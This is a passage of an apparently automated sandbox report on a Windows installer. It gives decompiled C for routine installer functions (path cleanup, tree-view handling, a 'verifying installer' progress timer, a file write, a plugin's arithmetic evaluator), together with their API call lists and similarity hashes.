				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405E83(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                                                          0x004067c6
                                                                                                                                                                          0x004067cf
                                                                                                                                                                          0x004067e6
                                                                                                                                                                          0x004067e6
                                                                                                                                                                          0x004067ed
                                                                                                                                                                          0x004067f9
                                                                                                                                                                          0x004067f9
                                                                                                                                                                          0x004067fc
                                                                                                                                                                          0x004067ff
                                                                                                                                                                          0x00406804
                                                                                                                                                                          0x00406806
                                                                                                                                                                          0x0040680f
                                                                                                                                                                          0x00406813
                                                                                                                                                                          0x00406830
                                                                                                                                                                          0x00406838
                                                                                                                                                                          0x00406838
                                                                                                                                                                          0x0040683d
                                                                                                                                                                          0x0040683f
                                                                                                                                                                          0x00406842
                                                                                                                                                                          0x00406847
                                                                                                                                                                          0x00406848
                                                                                                                                                                          0x0040684c
                                                                                                                                                                          0x0040684c
                                                                                                                                                                          0x0040684d
                                                                                                                                                                          0x00406854
                                                                                                                                                                          0x00406856
                                                                                                                                                                          0x0040685d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406865
                                                                                                                                                                          0x0040686b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040686b
                                                                                                                                                                          0x00406870

                                                                                                                                                                          APIs
                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74E5FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                          • CharNextW.USER32(?,00000000,74E5FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                          • CharPrevW.USER32(?,?,74E5FAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                          • API String ID: 589700163-2982765560
                                                                                                                                                                          • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                          • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                          • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404E54, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                                          0x00404e62
                                                                                                                                                                          0x00404e6f
                                                                                                                                                                          0x00404e75
                                                                                                                                                                          0x00404eb3
                                                                                                                                                                          0x00404eb3
                                                                                                                                                                          0x00404ec2
                                                                                                                                                                          0x00404ec9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404ecb
                                                                                                                                                                          0x00404e77
                                                                                                                                                                          0x00404e86
                                                                                                                                                                          0x00404e8e
                                                                                                                                                                          0x00404e91
                                                                                                                                                                          0x00404ea3
                                                                                                                                                                          0x00404ea9
                                                                                                                                                                          0x00404eb0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00404eb0
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404E77
                                                                                                                                                                          • ScreenToClient.USER32 ref: 00404E91
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                          • String ID: f
                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                          • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                                                                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                          • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 72E416BD, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E72E416BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                                                                                                                          0x72e416d7
                                                                                                                                                                          0x72e416e3
                                                                                                                                                                          0x72e416f0
                                                                                                                                                                          0x72e416f7
                                                                                                                                                                          0x72e41700
                                                                                                                                                                          0x72e4170c

                                                                                                                                                                          APIs
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,72E422D8,?,00000808), ref: 72E416D5
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,72E422D8,?,00000808), ref: 72E416DC
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,72E422D8,?,00000808), ref: 72E416F0
                                                                                                                                                                          • GetProcAddress.KERNEL32(72E422D8,00000000), ref: 72E416F7
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 72E41700
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                          • String ID: Nt@ht
                                                                                                                                                                          • API String ID: 1148316912-2189037465
                                                                                                                                                                          • Opcode ID: 3d59110917bd0dff5d755d010460a969928e36ec41b5f6a84fa6a267735a694b
                                                                                                                                                                          • Instruction ID: 1ef0117a34e7aedd44af7d58700a7a2aec7f9f166274ab57b3523288284e3f7e
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d59110917bd0dff5d755d010460a969928e36ec41b5f6a84fa6a267735a694b
                                                                                                                                                                          • Instruction Fuzzy Hash: 09F08C772061387BC6201AA78C0CD9BBE9CEF8B2F5B210615F2289219086226C12C7F2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00402F93, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41ea18; // 0x162ed
					_t11 =  *0x42aa24;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                                                                                                          0x00402fa3
                                                                                                                                                                          0x00402fb1
                                                                                                                                                                          0x00402fb7
                                                                                                                                                                          0x00402fb7
                                                                                                                                                                          0x00402fc5
                                                                                                                                                                          0x00402fc7
                                                                                                                                                                          0x00402fcd
                                                                                                                                                                          0x00402fd4
                                                                                                                                                                          0x00402fd6
                                                                                                                                                                          0x00402fd6
                                                                                                                                                                          0x00402fec
                                                                                                                                                                          0x00402ffc
                                                                                                                                                                          0x0040300e
                                                                                                                                                                          0x0040300e
                                                                                                                                                                          0x00403016

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                          • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                          • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                                                                          • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                          • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00402950, Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                          			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                                                                                                                                          0x00402950
                                                                                                                                                                          0x00402952
                                                                                                                                                                          0x00402957
                                                                                                                                                                          0x0040295c
                                                                                                                                                                          0x0040295f
                                                                                                                                                                          0x00402969
                                                                                                                                                                          0x0040296d
                                                                                                                                                                          0x0040296d
                                                                                                                                                                          0x00402973
                                                                                                                                                                          0x00402980
                                                                                                                                                                          0x00402988
                                                                                                                                                                          0x0040298b
                                                                                                                                                                          0x00402997
                                                                                                                                                                          0x0040299a
                                                                                                                                                                          0x004029a0
                                                                                                                                                                          0x004029ae
                                                                                                                                                                          0x004029b3
                                                                                                                                                                          0x004029b7
                                                                                                                                                                          0x004029ba
                                                                                                                                                                          0x004029c3
                                                                                                                                                                          0x004029cf
                                                                                                                                                                          0x004029d3
                                                                                                                                                                          0x004029d6
                                                                                                                                                                          0x004029e0
                                                                                                                                                                          0x004029ff
                                                                                                                                                                          0x004029ec
                                                                                                                                                                          0x004029f4
                                                                                                                                                                          0x004029f7
                                                                                                                                                                          0x004029fc
                                                                                                                                                                          0x004029fc
                                                                                                                                                                          0x00402a06
                                                                                                                                                                          0x00402a06
                                                                                                                                                                          0x00402a13
                                                                                                                                                                          0x00402a19
                                                                                                                                                                          0x00402a1f
                                                                                                                                                                          0x00402a1f
                                                                                                                                                                          0x004029b7
                                                                                                                                                                          0x00402a33
                                                                                                                                                                          0x00402a35
                                                                                                                                                                          0x00402a35
                                                                                                                                                                          0x00402a3f
                                                                                                                                                                          0x00402a40
                                                                                                                                                                          0x00402a44
                                                                                                                                                                          0x00402a48
                                                                                                                                                                          0x00402a4e
                                                                                                                                                                          0x00402a4e
                                                                                                                                                                          0x00402a55
                                                                                                                                                                          0x004022f1
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00402A06
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 00402A19
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                          • Opcode ID: c09f88393dad7e49db1c0c0bce69c86a4b2892c54f12e84c7596cf8cd055c016
                                                                                                                                                                          • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                                                                          • Opcode Fuzzy Hash: c09f88393dad7e49db1c0c0bce69c86a4b2892c54f12e84c7596cf8cd055c016
                                                                                                                                                                          • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 72E41979, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                          			E72E41979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x72e4506c = _a8;
				_t77 = 0;
				 *0x72e45070 = _a16;
				_v12 = 0;
				_v8 = E72E412E3();
				_t90 = E72E413B1(_t42);
				_t87 = _t85;
				_t81 = E72E412E3();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E72E412E3();
					_t77 = E72E413B1(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81 & 0x0000ffff;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
						if( *((short*)(_t81 + 2)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E72E41510(_t85, _t90, _t87,  &_v76);
								E72E41312( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E72E43050(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
						if( *((short*)(_t81 + 2)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((short*)(_t81 + 4)) != 0x3e) {
							_t48 = E72E43070(_t59, _t83, _t85);
						} else {
							_t48 = E72E430A0(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
						if( *((short*)(_t81 + 2)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E72E42EE0(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E72E42F90(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((short*)(_t81 + 2)) - 0x26;
					if( *((short*)(_t81 + 2)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E72E42EA0(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                                                                                                          0x72e41979
                                                                                                                                                                          0x72e41983
                                                                                                                                                                          0x72e4198c
                                                                                                                                                                          0x72e4198f
                                                                                                                                                                          0x72e41994
                                                                                                                                                                          0x72e4199d
                                                                                                                                                                          0x72e419a6
                                                                                                                                                                          0x72e419a8
                                                                                                                                                                          0x72e419af
                                                                                                                                                                          0x72e419b1
                                                                                                                                                                          0x72e419b4
                                                                                                                                                                          0x72e419bb
                                                                                                                                                                          0x72e419c9
                                                                                                                                                                          0x72e419d2
                                                                                                                                                                          0x72e419d7
                                                                                                                                                                          0x72e419da
                                                                                                                                                                          0x72e419e0
                                                                                                                                                                          0x72e419e0
                                                                                                                                                                          0x72e419e3
                                                                                                                                                                          0x72e419e6
                                                                                                                                                                          0x72e419e9
                                                                                                                                                                          0x72e41ab1
                                                                                                                                                                          0x72e41ab1
                                                                                                                                                                          0x72e41ab4
                                                                                                                                                                          0x72e41b34
                                                                                                                                                                          0x72e41b39
                                                                                                                                                                          0x72e41b48
                                                                                                                                                                          0x72e41b4b
                                                                                                                                                                          0x72e41b53
                                                                                                                                                                          0x72e41b53
                                                                                                                                                                          0x72e41b53
                                                                                                                                                                          0x72e41b55
                                                                                                                                                                          0x72e41b55
                                                                                                                                                                          0x72e41b56
                                                                                                                                                                          0x72e41b56
                                                                                                                                                                          0x72e41b58
                                                                                                                                                                          0x72e41b5a
                                                                                                                                                                          0x72e41b60
                                                                                                                                                                          0x72e41b69
                                                                                                                                                                          0x72e41b7a
                                                                                                                                                                          0x72e41b85
                                                                                                                                                                          0x72e41b85
                                                                                                                                                                          0x72e41b4d
                                                                                                                                                                          0x72e41b2f
                                                                                                                                                                          0x72e41b2f
                                                                                                                                                                          0x72e41b31
                                                                                                                                                                          0x72e41b31
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b31
                                                                                                                                                                          0x72e41b4f
                                                                                                                                                                          0x72e41b51
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b51
                                                                                                                                                                          0x72e41b3d
                                                                                                                                                                          0x72e41b41
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b41
                                                                                                                                                                          0x72e41ab6
                                                                                                                                                                          0x72e41ab6
